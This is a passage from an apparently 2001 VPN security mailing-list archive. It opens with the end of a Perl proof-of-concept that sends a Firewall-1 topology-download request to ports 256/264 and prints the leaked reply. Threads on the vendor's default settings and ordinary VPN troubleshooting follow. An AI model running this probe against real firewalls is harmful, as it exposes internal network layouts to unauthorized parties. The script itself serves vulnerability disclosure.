$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);
if ($#results == 0) {
  print "No results on port 256 - trying 264\n";
  $port=264;
  @results2=sendraw($SENDY);
  if ($#results2 == 0) {die "Sorry - no results\n";}
  else {print @results2;}
} else {print @results;}

# Open a TCP connection to $target:$port, send $pstr and return
# whatever the firewall sends back, line by line
sub sendraw {
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    my @in;
    select(S); $|=1; print $pstr;
    while(<S>){ push @in, $_;}     # read until the remote end closes
    select(STDOUT);
    close(S);
    return @in;
  } else { return ""; }
}
# Spidermark: sensepostdata fw1

From tbird at precision-guesswork.com Wed Jul 18 10:53:59 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Wed, 18 Jul 2001 09:53:59 -0500 (CDT)
Subject: Firewall-1 Information leak (fwd)
Message-ID:

A correction to the earlier posting.

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

---------- Forwarded message ----------
Date: Wed, 18 Jul 2001 11:01:33 +0200
From: Lars Troen
To: Haroon Meer
Cc: bugtraq at securityfocus.com
Subject: RE: Firewall-1 Information leak

Haroon,

The default setting in 4.1SP1 (CP2000) and later is *not* to respond to unauthenticated topology downloads. You must check the box in Policy Properties in order to activate it.
Lars

-----Original Message-----
From: Haroon Meer [mailto:haroon at sensepost.com]
Sent: Wednesday, July 18, 2001 03:29
To: bugtraq at securityfocus.com
Subject: Firewall-1 Information leak

From Jfunke at kortexcomputer.com Wed Jul 18 17:08:05 2001
From: Jfunke at kortexcomputer.com (Justin Funke)
Date: Wed, 18 Jul 2001 16:08:05 -0500
Subject: Desktop Nics with Cryptography offloading
Message-ID: <0FA4FC04D3B1D411B34F0090275BE0630126D386@SM-MAIL>

I have specifically asked Intel if these "S" series NICs would offload the encryption/decryption for standard "public" VPNs vs. "LAN" encrypted communications.

They claim that it is not possible, but I don't see how this is true. If it is offloading IPSEC traffic, how does the NIC know what is public vs. private traffic?

http://www.intel.com/network/connectivity/resources/doc_library/data_sheets/pro100s.pdf

And if it does have a way of detecting it, couldn't the traffic be encapsulated to trick the NIC into thinking it was a local connection?

Any ideas?

Thanks,
Justin

From jsdy at cospo.osis.gov Wed Jul 18 17:39:11 2001
From: jsdy at cospo.osis.gov (Joseph S D Yao)
Date: Wed, 18 Jul 2001 17:39:11 -0400
Subject: Firewall-1 Information leak (fwd)
In-Reply-To: ; from tbird@precision-guesswork.com on Wed, Jul 18, 2001 at 09:53:59AM -0500
References:
Message-ID: <20010718173911.A19523@washington.cospo.osis.gov>

On Wed, Jul 18, 2001 at 09:53:59AM -0500, Tina Bird wrote:
> A correction to the earlier posting.
...
> ---------- Forwarded message ----------
> Date: Wed, 18 Jul 2001 11:01:33 +0200
> From: Lars Troen
...
> The default setting in 4.1SP1 (CP2000) and later is *not* to respond to
> unauthenticated topology downloads. You must check the box in Policy
> Properties in order to activate it.

Excuse me? If it is a default setting, why do you have to check a box to activate it?

[Having mulled over this for some seconds now ...]
Or do you mean what you did NOT say, which is that there is a box one may check in Policy Properties to activate responding to topology downloads even if they are not authenticated?

--
Joe Yao                         jsdy at cospo.osis.gov - Joseph S. D. Yao
OSIS Center Computer Support                                    EMT-B
-----------------------------------------------------------------------
This message is not an official statement of COSPO policies.

From tbird at precision-guesswork.com Thu Jul 19 11:01:38 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Thu, 19 Jul 2001 10:01:38 -0500 (CDT)
Subject: [fw-wiz] VPN help !! please (fwd)
Message-ID:

---------- Forwarded message ----------
Date: Thu, 19 Jul 2001 08:10:39 -0500
From: Bill Asher
To: "Firewall Wizard Mailing List (E-mail)"
Subject: [fw-wiz] VPN help !! please

My network:

ba-fw01 PPP 199.217.219.121 199.217.219.126

Home LAN -- Firewall(ba-fw01) -- modem -->internet<-- Router   -- Firewall(fw02) -- Office LAN
10.2.2.X -- 10.2.2.1          -- modem -->internet<-- 10.0.0.1 --                -- 10.0.0.x

I'm having a few issues getting my VPN tunnel made. Below are my config files; I used jixen.tripod.com RoadWarrior as an example. I am a bit confused on the left and right aspects for each location. I have read that the configs should be identical, while other examples show the left and right information swapping for each firewall.

I have also added:

ipchains -A forward -i $GREEN_DEV -d $GREEN_NETADDRESS/$GREEN_NETMASK -j ACCEPT

to each firewall's rc.firewall.up config.

Also, what exactly should be in my ipsec.secrets config file??

Any suggestions, show me where I'm going wrong!!
Thanks,
Bill

######### Configs ####################

# Road - Work VPN
# Road /etc/ipsec.conf config file - 7/16/01

config setup
        interfaces=%defaultroute
        klipsdebug=none
        plutodebug=none
        plutoload=%search
        plutostart=%search

conn %default
        keyingtries=1

conn road-work
        left=%defaultroute
        leftsubnet=
        leftnexthop=
        right=199.217.219.126
        rightsubnet=10.0.0.0/8
        rightnexthop=199.217.219.121
        auto=start
        authby=rsasig
        leftid=@ba-fw01.basher.com
        rightid=@fw02.schultz-design.com
        leftrsasigkey=0x0A
        rightrsasigkey=0x0B

# Road - Work VPN
# Work /etc/ipsec.conf config file - 7/16/01

config setup
        interfaces="ipsec0=eth2"
        klipsdebug=none
        plutodebug=none
        plutoload=%search
        plutostart=%search

conn %default
        keyingtries=1

conn road-work
        left=0.0.0.0
        leftsubnet=
        leftnexthop=
        right=199.217.219.126
        rightsubnet=10.0.0.0/8
        rightnexthop=199.217.219.121
        auto=add
        authby=rsasig
        leftid=@ba-fw01.basher.com
        rightid=@fw02.schultz-design.com
        leftrsasigkey=0x0A
        rightrsasigkey=0x0B

Error Messages:

root at ba-fw01~# ipsec setup --restart
ipsec_setup: Stopping FreeS/WAN IPSEC...
ipsec_setup: Starting FreeS/WAN IPSEC 1.8...
ipsec_setup: WARNING: ipsec0 has route filtering turned on, KLIPS may not work
ipsec_setup: (/proc/sys/net/ipv4/conf/ipsec0/rp_filter = `1', should be 0)
ipsec_setup: WARNING: ppp0 has route filtering turned on, KLIPS may not work
ipsec_setup: (/proc/sys/net/ipv4/conf/ppp0/rp_filter = `1', should be 0)
ipsec_setup: 102 "road-work" #1: STATE_MAIN_I1: initiate
ipsec_setup: 104 "road-work" #1: STATE_MAIN_I2: from STATE_MAIN_I1; sent MI2, expecting MR2
ipsec_setup: 106 "road-work" #1: STATE_MAIN_I3: from STATE_MAIN_I2; sent MI3, expecting MR3
ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key?
ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION
ipsec_setup: 010 "road-work" #1: STATE_MAIN_I3: retransmission; will wait 20s for response
ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key?
ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION
ipsec_setup: 010 "road-work" #1: STATE_MAIN_I3: retransmission; will wait 40s for response
ipsec_setup: 003 "road-work" #1: SIG did not decrypt into good ECB: no leading 00. Bad key?
ipsec_setup: 217 "road-work" #1: STATE_MAIN_I3: INVALID_KEY_INFORMATION
ipsec_setup: 031 "road-work" #1: max number of retransmissions (2) reached STATE_MAIN_I3. Possible authentication failure: no acceptable response to our first encrypted message

root at ba-fw01~# ipsec auto --up road-work
102 "road-work" #2: STATE_MAIN_I1: initiate
104 "road-work" #2: STATE_MAIN_I2: from STATE_MAIN_I1; sent MI2, expecting MR2
106 "road-work" #2: STATE_MAIN_I3: from STATE_MAIN_I2; sent MI3, expecting MR3
003 "road-work" #2: SIG did not decrypt into good ECB: no leading 00. Bad key?
217 "road-work" #2: STATE_MAIN_I3: INVALID_KEY_INFORMATION
010 "road-work" #2: STATE_MAIN_I3: retransmission; will wait 20s for response
003 "road-work" #2: SIG did not decrypt into good ECB: no leading 00. Bad key?
217 "road-work" #2: STATE_MAIN_I3: INVALID_KEY_INFORMATION

root at ba-fw01~# cat /proc/net/ipsec_tncfg
ipsec0 -> ppp0 mtu=16260 -> 1524
ipsec1 -> NULL mtu=0 -> 0
ipsec2 -> NULL mtu=0 -> 0
ipsec3 -> NULL mtu=0 -> 0

root at fw02~# cat /proc/net/ipsec_tncfg
ipsec0 -> eth2 mtu=16260 -> 1500
ipsec1 -> NULL mtu=0 -> 0
ipsec2 -> NULL mtu=0 -> 0
ipsec3 -> NULL mtu=0 -> 0

B .
A s h e r
IT Manager
S C H U L T Z   D E S I G N
(636)936-2900
www.schultz-design.com

_______________________________________________
firewall-wizards mailing list
firewall-wizards at nfr.com
http://www.nfr.com/mailman/listinfo/firewall-wizards

From lars.troen at proxycom.no Thu Jul 19 04:21:08 2001
From: lars.troen at proxycom.no (Lars Troen)
Date: Thu, 19 Jul 2001 10:21:08 +0200
Subject: Firewall-1 Information leak (fwd)
In-Reply-To: <20010718173911.A19523@washington.cospo.osis.gov>
Message-ID:

Joe,

Your last paragraph is right ;-)

What I meant to say was that the default setting in firewall-1 doesn't allow unauthenticated topology downloads. But you can activate these unauthenticated topology downloads in Policy Properties (not recommended, but it's still there because of backward compatibility with old SecuRemote clients). The default setting in 4.0 and earlier was to respond to unauthenticated topology downloads.

Lars

-----Original Message-----
From: Joseph S D Yao [mailto:jsdy at cospo.osis.gov]
Sent: Wednesday, July 18, 2001 23:39
To: Tina Bird
Cc: vpn at securityfocus.com; Lars Troen
Subject: Re: Firewall-1 Information leak (fwd)

On Wed, Jul 18, 2001 at 09:53:59AM -0500, Tina Bird wrote:
> A correction to the earlier posting.
...
> ---------- Forwarded message ----------
> Date: Wed, 18 Jul 2001 11:01:33 +0200
> From: Lars Troen
...
> The default setting in 4.1SP1 (CP2000) and later is *not* to respond to
> unauthenticated topology downloads. You must check the box in Policy
> Properties in order to activate it.

Excuse me? If it is a default setting, why do you have to check a box to activate it?

[Having mulled over this for some seconds now ...]

Or do you mean what you did NOT say, which is that there is a box one may check in Policy Properties to activate responding to topology downloads even if they are not authenticated?

--
Joe Yao                         jsdy at cospo.osis.gov - Joseph S. D.
Yao
OSIS Center Computer Support                                    EMT-B
-----------------------------------------------------------------------
This message is not an official statement of COSPO policies.

From bharatiabhijit at rediffmail.com Thu Jul 19 03:55:19 2001
From: bharatiabhijit at rediffmail.com (Abhijit Bharati)
Date: 19 Jul 2001 07:55:19 -0000
Subject: Fw: Re: VPN-Project-Requires Hepl!
Message-ID: <20010719075519.8469.qmail@mailFA8.rediffmail.com>

Dear Sir/Madam,

I was directed to you by Tina. Our original communication is as follows. Can you please help me out?

Abhijit.

------------- Original Message --------------
Tina Bird wrote:
To: Abhijit Bharati
From: Tina Bird
Date: Sat, 14 Jul 2001 12:02:39 -0500 (CDT)
Subject: Re: VPN-Project-Requires Hepl!

please send to vpn at securityfocus.com

On 12 Jul 2001, Abhijit Bharati wrote:

> Date: 12 Jul 2001 08:56:59 -0000
> From: Abhijit Bharati
> To: "tbird at precision-guesswork.com"
> Subject: VPN-Project-Requires Hepl!
>
> Dear Tina,
> I am a Management student working part-time in HCL-Infinet India. HCL-Infinet is an ISP and is in the VPN service providing business. HCL-Infinet has 42 PoP servers in India and good contacts with the Department of Telecommunication.
> In my project I have to do "Demand Forecasting" for the VPN in India. For this we did one "Market Research", the data of which is not giving us the proper results.
> Such kinds of projects, though new in India, I think must have been done already. I just want to know whether such a kind of launching project has been done by somebody to whom you can direct me. Can you please help me?
> Hope you will kindly reply.
>
> Abhijit Bharati.
VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

From sandy at storm.ca Thu Jul 19 16:33:25 2001
From: sandy at storm.ca (Sandy Harris)
Date: Thu, 19 Jul 2001 16:33:25 -0400
Subject: [fw-wiz] VPN help !! please (fwd)
References:
Message-ID: <3B574415.280A15BC@storm.ca>

Tina Bird wrote:

> ---------- Forwarded message ----------
> Date: Thu, 19 Jul 2001 08:10:39 -0500
> From: Bill Asher
> To: "Firewall Wizard Mailing List (E-mail)"
> Subject: [fw-wiz] VPN help !! please
>
> I'm having a few issues getting my VPN tunnel made. Below are my config
> files, I used jixen.tripod.com RoadWarrior as an example.
...

It looks as though you are using Linux FreeS/WAN, so you should likely ask your questions on the FreeS/WAN users mailing list.

http://lists.freeswan.org/mailman/listinfo/users

From sandy at storm.ca Sun Jul 22 11:50:45 2001
From: sandy at storm.ca (Sandy Harris)
Date: Sun, 22 Jul 2001 11:50:45 -0400
Subject: Desktop Nics with Cryptography offloading
References: <0FA4FC04D3B1D411B34F0090275BE0630126D386@SM-MAIL>
Message-ID: <3B5AF655.3CA1AE7A@storm.ca>

Justin Funke wrote:
>
> I have specifically asked Intel if these "S" series NICs would offload the
> encryption/decryption for standard "public" VPN's vs "LAN" encrypted
> communications.
>
> They claim that it is not possible but I don't see how this is true. If it
> is offloading IPSEC traffic how does the nic know what is public vs. private
> traffic.
>
> http://www.intel.com/network/connectivity/resources/doc_library/data_sheets/
> pro100s.pdf
>
> And if it does have a way of detecting it - couldn't the traffic be
> encapsulated to trick the Nic into thinking it was a local connection.

An Intel staff member has recently turned up on the design discussion list for the FreeS/WAN implementation of IPSEC for Linux. He says he has patches to make FreeS/WAN work with some Intel accelerated cards. Check the list archives for details:

http://lists.freeswan.org/mailman/listinfo/design

A description of the current state of hardware acceleration for FreeS/WAN is at:

http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/compat.html#hardware

More expensive alternatives might be:

www.redcreek.com   an IPSEC gateway on a card, with its own CPU plus crypto chips
www.merilus.com    Merilus Firecard, a Linux firewall including IPSEC on a PCI card.

From franci.jereb at mibo.si Sun Jul 22 16:09:49 2001
From: franci.jereb at mibo.si (Franci Jereb)
Date: Sun, 22 Jul 2001 22:09:49 +0200
Subject: MS CA certificates & VPN Brick : internetworking ?
Message-ID: <01C112FB.073D8C90.franci.jereb@mibo.si>

Hi guys!

Has anybody tried usage of Micro$oft Certificate Authority and VPN Brick 201? If so, then please mail me!
Best regards,
Franci Jereb
System engineer
Mibo Komunikacije
www.mibo.si

From tbird at precision-guesswork.com Mon Jul 23 12:36:49 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Mon, 23 Jul 2001 11:36:49 -0500 (CDT)
Subject: Paper on PPTP auth for wireless networks (fwd)
Message-ID:

For those of you contemplating PPTP over wireless networks:

---------- Forwarded message ----------
Date: Mon, 23 Jul 2001 18:20:25 +0200 (CEST)
From: Wolfgang Zenker
To: PEN-TEST at securityfocus.com
Subject: Paper on PPTP auth for wireless networks

Hello,

The (German language) "Heise Newsticker" (www.heise.de) just reported the availability of a new (English language) paper about breaking MS-PPTP Auth Extensions (MS-CHAPv2) when used on heterogeneous wireless networks. Thought it might be of interest to some of the readers. It can be found at

http://mopo.informatik.uni-freiburg.de/pptp_mschapv2/

Wolfgang Zenker

--
Wolfgang Zenker            Mail: W.Zenker at jpaves.de
JPAVES Unix Online GmbH    Fon:  (+49) 721 / 955 40 60
Kaiserallee 87             Fax:  (+49) 721 / 955 40 62
D-76185 Karlsruhe          Web:  www.jpaves.de

From DLeija at PENSON.COM Mon Jul 23 18:18:17 2001
From: DLeija at PENSON.COM (David Leija)
Date: Mon, 23 Jul 2001 17:18:17 -0500
Subject: Inter-Corporate VPN's
Message-ID: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002>

We are planning to deploy Netscreen NS-5's to our clients. They will connect to our network using specified protocols with a NS-10.
I'm not sure this is exclusively VPN related, but we've found that a lot of clients are going to have network architectures similar to ours or even each other's. We've noticed at least 60% use the 172.16.0.0 range for their internal addressing. Do Netscreens, or possibly an alternative solution, account for this possibility? We want to avoid creating multiple DMZ-NAT-DMZ layers if possible. TIA.

L. David Leija
Penson Financial Services
dleija at penson.com
(214) 765-1228

From jonc at nc.rr.com Mon Jul 23 21:42:09 2001
From: jonc at nc.rr.com (Jon Carnes)
Date: Mon, 23 Jul 2001 21:42:09 -0400
Subject: Inter-Corporate VPN's
In-Reply-To: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002>
References: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002>
Message-ID: <01072321420901.00984@anncons.nc.rr.com>

On Monday 23 July 2001 18:18, David Leija wrote:
> We are planning to deploy Netscreen NS-5's to our clients. They will
> connect to our network using specified protocols with a NS-10. I'm not
> sure this is exclusively VPN related, but we've found that a lot of
> clients are going to have network architectures similar to ours or even
> each others. We've notice at least 60% use the 172.16.0.0 range for their
> internal addressing. Do Netscreens, or possibly an alternative solution,
> account for this possibility. We want to avoid creating multiple
> DMZ-NAT-DMZ layers if possible. TIA.
>
> L. David Leija
> Penson Financial Services
> dleija at penson.com
> (214) 765-1228

We've had a problem with the 10.0.0.0 networks. Everyone we hook up to seems to run one.

One solution is to run two IP networks on the same wire. We use 10.0.0.0 as our primary internal, and have a secondary 192.168.2.0 network that our primary servers also run. It gives us redundancy on our backbone as well as a second internally routable IP address to reach our servers.
It's not perfect, but until we move to IPv6, it works.

Jon Carnes
MIS - HAHT Commerce

From cspiro at dm.net.lb Tue Jul 24 07:08:57 2001
From: cspiro at dm.net.lb (Esper Choueiry)
Date: Tue, 24 Jul 2001 13:08:57 +0200
Subject: PIX to PIX VPN
Message-ID: <001001c11431$09ea2f20$4d02a8c0@spiro>

Hello All,

I'm configuring a PIX to PIX VPN. My VPN connection is established and the two VPN ends have full access to each other. How can we configure the PIX so the conduit configured can still be applied, so the two VPN ends will have limited access?

Regards.
____________________________________________
Esper S Choueiry
Network Engineer - CCNP/CCDP
Data Consult s.a.l.
Tel.:  + 961 1 380 378
Fax.:  + 961 1 386 274
Cell.: + 961 3 370 668
e-mail: spiro at dataconsult.com.lb
____________________________________________

From hank_haines at hotmail.com Tue Jul 24 12:51:54 2001
From: hank_haines at hotmail.com (john Haines)
Date: Tue, 24 Jul 2001 17:51:54 +0100
Subject: PIX to PIX VPN
Message-ID:

Try this out. The PIX is essentially configured the same as a standard IOS router for peer to peer VPN. Basically you just need to tighten the access list applied to the crypto map (i.e. access-list 100 in the example below).

http://www.cisco.com/warp/public/110/38.html

Regards,
John Haines

----Original Message Follows----
From: "Esper Choueiry"
Reply-To:
To:
Subject: PIX to PIX VPN
Date: Tue, 24 Jul 2001 13:08:57 +0200

Hello All,

I'm configuring PIX to PIX VPN my VPN connection is established and the Two VPN end are having full access to each others. how can we configure the PIX so the Conduit configured can still be applied so the two VPN ends will have limited access.

Regards.
____________________________________________
Esper S Choueiry
Network Engineer - CCNP/CCDP
Data Consult s.a.l.
Tel.:  + 961 1 380 378
Fax.:  + 961 1 386 274
Cell.: + 961 3 370 668
e-mail: spiro at dataconsult.com.lb
____________________________________________

From carlsonmail at yahoo.com Tue Jul 24 15:49:05 2001
From: carlsonmail at yahoo.com (Chris Carlson)
Date: Tue, 24 Jul 2001 12:49:05 -0700 (PDT)
Subject: Inter-Corporate VPN's
In-Reply-To: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002>
Message-ID: <20010724194905.21861.qmail@web13901.mail.yahoo.com>

Ah! You're running into one of the problems with IPSec VPNs. Overlapping IP address space is a huge limitation, and NAT pools will only complicate the matter further in addition to causing problems with IPSec.

My suggestion is thus: Don't do a workaround with your IP address space. You'll never get it right, and the next customer/partner/supplier that you link up might break it. SOLVE it by going with publicly addressable IP address space. Create a second DMZ with this routable space and put your servers here. This second DMZ will allow you to quickly and easily add the segment without impacting how you do your current primary DMZ.

Also, if you have customers connecting to your servers, you shouldn't have them connect to the INSIDE of your network in the first place. Any compromise on the server they're allowed to go to will let them access other parts of the network. Keep them separated!

Oh, another way to do it is to host your servers in a Data Center (like Exodus, a qualified ISP, or other). You'll still get public IP space, you can put your NetScreen boxes there, plus you'll get the benefit of power backup, cooling, etc.

Good luck to you. Please respond back to the list with what you eventually decided upon.

Chris
--

--- David Leija wrote:
> We are planning to deploy Netscreen NS-5's to our
> clients.
> They will connect
> to our network using specified protocols with a
> NS-10. I'm not sure this is
> exclusively VPN related, but we've found that a lot
> of clients are going to
> have network architectures similar to ours or even
> each others. We've notice
> at least 60% use the 172.16.0.0 range for their
> internal addressing. Do
> Netscreens, or possibly an alternative solution,
> account for this
> possibility. We want to avoid creating multiple
> DMZ-NAT-DMZ layers if
> possible. TIA.
>
> L. David Leija
> Penson Financial Services
> dleija at penson.com
> (214) 765-1228

From tbird at precision-guesswork.com Wed Jul 25 12:16:13 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Wed, 25 Jul 2001 11:16:13 -0500 (CDT)
Subject: Issues w/ Nortel VPN
In-Reply-To: <4.3.2.7.0.20010724232509.00b87550@pop.ce.mediaone.net>
Message-ID:

You ought to be able to re-generate them manually. If that fixes it, then a key generation problem may be your issue. I've not worked on Nortel gear -- anyone out there know what the commands are to do this?

On Tue, 24 Jul 2001, Bill Yazji wrote:

> Date: Tue, 24 Jul 2001 23:25:27 -0500
> From: Bill Yazji
> To: Tina Bird
> Subject: Re: Issues w/ Nortel VPN
>
> How do I ensure that the keys are being re-generated when the lifetimes expire?
>
> Thanks
> ~Bill
>
> At 05:37 PM 6/6/2001, you wrote:
> >Does the problem happen at a regular period, like every
> >hour? Are you using dynamic key management (IKE)? If so,
> >are the keys being re-generated when their lifetimes expire?
> >
> >And does the problem only happen with the broadband users?
> >Is the cable modem or DSL gateway at their home changing IP
> >address?
> >
> >On Wed, 6 Jun 2001, Bill Yazji wrote:
> >
> > > Date: Wed, 06 Jun 2001 14:17:22 -0500
> > > From: Bill Yazji
> > > To: vpn at securityfocus.com
> > > Subject: Issues w/ Nortel VPN
> > >
> > > On my corporate network, we implemented the Nortel Contivity Extranet
> > switches.
> > >
> > > We are having issues with broadband users (mostly cable) having their
> > > tunnels cease transmitting traffic.
> > >
> > > The Nortel software says that it is still connected, but still having
> > > issues with not passing traffic. The end user has to take the tunnel down,
> > > and restart to get the tunnel active again.
> > >
> > > Checked just about everything, and am going nuts.
> > >
> > > Any suggestions?
> > >
> > > ~Bill
> > > byazji at psualum.com
> > >
> > > ----
> > > Bill Yazji
> > > byazji at psualum.com
> > >
> > > "Your Choices Are Half Chance, So Are Everybody Else's"
> > > "Never Under Estimate The Power Of Stupid People In Small Groups"
> > >
> > > ----
> >
> >VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
> >life: http://kubarb.phsx.ukans.edu/~tbird
> >work: http://www.counterpane.com
>
> ----
> Bill Yazji
> byazji at psualum.com
>
> "If The Whole World Didn't Suck, We'd All Fall Off!"
> "Your Choices Are Half Chance, So Are Everybody Else's"
> "Never Under Estimate The Power Of Stupid People In Small Groups"
>
> ----

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

From ng_son99 at hotmail.com Thu Jul 26 04:22:53 2001
From: ng_son99 at hotmail.com (Nguyen Son)
Date: Thu, 26 Jul 2001 16:22:53 +0800
Subject: IP forwarding Question
References: <15E71AB50D3ED311A20A0008C75B6B31053F21E8@EXPEN002>
Message-ID:

Hi all,

Situation:
I have one IP. This IP is used by a (Cisco) router and 10 workstations (Win98). All workstations need to connect to the internet; right now I don't have any server.

Now I want to set up a Win2k Server, VPN (PPTP) and NAT. I want to use a fixed IP to do VPN. I have talked with a staff member (from the ISP co. that provides us the IP); he said that he can forward the IP to a port and then the VPN server will listen on that port and handle requests accordingly, and he asked me which port it should forward to. I normally have two fixed IPs to work with.

Questions:
Is it possible to use the IP that is forwarded from the router for the VPN service? If yes, is there any compulsory port or do I just pick one?
Is there any other solution for this situation?
TIA
Son

From tbird at precision-guesswork.com Fri Jul 27 19:16:02 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Fri, 27 Jul 2001 18:16:02 -0500 (CDT)
Subject: FW: New Cisco VPN Resources Now Available (fwd)
Message-ID:

-----Original Message-----
From: Cisco Technical Assistance Center [mailto:TAC_newsflash at ciscomessage.com]
Sent: Friday, July 27, 2001 5:23 PM
To: tbird at counterpane.com
Subject: New VPN Resources Now Available

____________________________________________
Cisco Technical Assistance Center
News Flash - July 27, 2001
http://www.cisco.com/tac
--------------------------------------------
Introducing New VPN Resources to Answer Output, Security, and Configuration Questions
____________________________________________

Dear Cisco Customer,

In response to recent customer inquiries, the Cisco Technical Assistance Center has updated the TAC Web Site to provide new and expanded Virtual Private Network (VPN) resources. Three new Cisco VPN resources provide information to fix VPN and PIX(R) configuration errors, document IP Security (IPSec) compatibilities, and illustrate PIX Firewall configurations.

Enhancements to the Output Interpreter let you paste your PIX configuration into the tool via a "write term." The Output Interpreter tool checks for common VPN configuration errors in addition to regular PIX configuration errors.
The Output Interpreter can be found at:
http://www.cisco.com/tac/newsflash/oi_07272001_seg2.html

A new Tech Note uses a matrix format to show the versions of Cisco hardware/software that support IP Sec/Point-to-Point Tunneling Protocol (IPSec/PPTP), including the following:

* Cisco IOS(R) Software Releases 12.0.7T and later
* Cisco VPN 3000 and 5000 Concentrators
* Cisco Secure PIX Firewall and PIX Firewall Software 5.0.x through 6.0.x
* Cisco Secure VPN Client 1.0 and 1.1
* Cisco VPN Client 2.5 and later
* Microsoft Windows 9.x, ME, NT 4.0, and 2000
* Solaris 2.6
* Linux 2.2.14
* Mac OS 9

The matrix can be found at:
http://www.cisco.com/tac/newsflash/vpn_07272001_seg2.html

A new sample configuration provides information on configuring Cisco Secure PIX Firewall 6.0.x and Cisco VPN 3000 Clients using IPSec. The sample configuration shows two different versions of VPN 3000 clients connecting and encrypting traffic with the Cisco Secure PIX Firewall as the tunnel endpoint. The configuration is based on PIX Software Release 6.0.1, and Cisco VPN 3000 Client Versions 2.5 and 3.0.

The Sample Configuration can be found at:
http://www.cisco.com/tac/newsflash/pix_07272001_seg2.html

We hope you find these TAC Web Site resources helpful.
Sincerely,
Cisco TAC

From ng_son99 at hotmail.com Sat Jul 28 00:02:07 2001
From: ng_son99 at hotmail.com (Nguyen Son)
Date: Sat, 28 Jul 2001 12:02:07 +0800
Subject: Filter problem
References: <20010724194905.21861.qmail@web13901.mail.yahoo.com>
Message-ID:

Hi all,

I have a Win2k server (SP2) doing VPN (PPTP). I have two NICs, one internal and the other external; this one connects directly to the internet.

If I accept the defaults of Input Filter and Output Filter in IP Routing --> General --> External --> Properties, VPN works fine. But if I follow the instructions in http://support.microsoft.com/support/kb/articles/Q255/7/84.ASP then the server cannot connect to the internet and the VPN client cannot connect to the server.

Are there any hints, tips, tricks?

TIA
Son